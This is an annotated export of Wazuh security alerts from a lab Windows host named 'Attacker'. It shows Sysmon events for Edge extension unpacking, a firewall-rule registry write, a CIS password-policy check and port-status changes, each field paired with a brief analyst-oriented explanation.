data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\manifest.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.508+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.623580
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5530634Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228129
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.551 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\sets.json CreationUtcTime: 2025-04-20 01:42:01.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\sets.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.540+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.540+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.626437
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5553469Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228131
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.553 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\_metadata\verified_contents.json CreationUtcTime: 2025-04-20 01:42:01.553 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\_metadata\\verified_contents.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:34:31.951+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:31.951+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534071.629391
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26003
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Minimum password length' is set to '14 or more character(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['net.exe accounts']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'net.exe accounts'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:33.866+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:33.866+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534073.635871
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:10.0067341Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228512
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:42:10.004 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B5C681E4-1680-4090-A10F-6F4486F58558} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\135.0.3179.85\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:10.004
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B5C681E4-1680-4090-A10F-6F4486F58558}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.85\\msedgewebview2.exe|Name=Microsoft Edge (mDNS-In)|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge WebView2 Runtime|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

The VSS service is shutting down due to idle timeout.

🧠 What happened? The VSS service is shutting down due to idle timeout.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:34:40.935+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:40.935+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  The VSS service is shutting down due to idle timeout.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60702
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534080.640385
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  VSS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8224
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:33:29.5025140Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2399
Incremental log record number – handy for timeline order.

data.win.system.processID:  12680
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The VSS service is shutting down due to idle timeout. "
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.binary:  2D20436F64653A2020434F525356434330303030303737322D2043616C6C3A2020434F525356434330303030303735342D205049443A202030303031323638302D205449443A202030303030333530342D20434D443A2020433A5C57494E444F57535C73797374656D33325C76737376632E6578652020202D20557365723A204E616D653A204E5420415554484F524954595C53595354454D2C205349443A532D312D352D313820
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Listened ports status (netstat) changed (new port opened or closed).

🧠 What happened? Listened ports status (netstat) changed (new port opened or closed).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:43.994+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:43.994+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Listened ports status (netstat) changed (new port opened or closed).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  533
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534143.642170
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

previous_output:  Previous output: ossec: output: 'netstat listening ports': tcp6 :::22 :::* 1/init tcp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve tcp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.53:53 0.0.0.0:* 729/systemd-resolve udp 127.0.0.54:53 0.0.0.0:* 729/systemd-resolve udp 192.168.6.137:68 0.0.0.0:* 710/systemd-network tcp 0.0.0.0:443 0.0.0.0:* 908/node tcp 0.0.0.0:1514 0.0.0.0:* 1711/wazuh-remoted tcp 0.0.0.0:1515 0.0.0.0:* 1626/wazuh-authd tcp 0.0.0.0:55000 0.0.0.0:* 1578/python3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

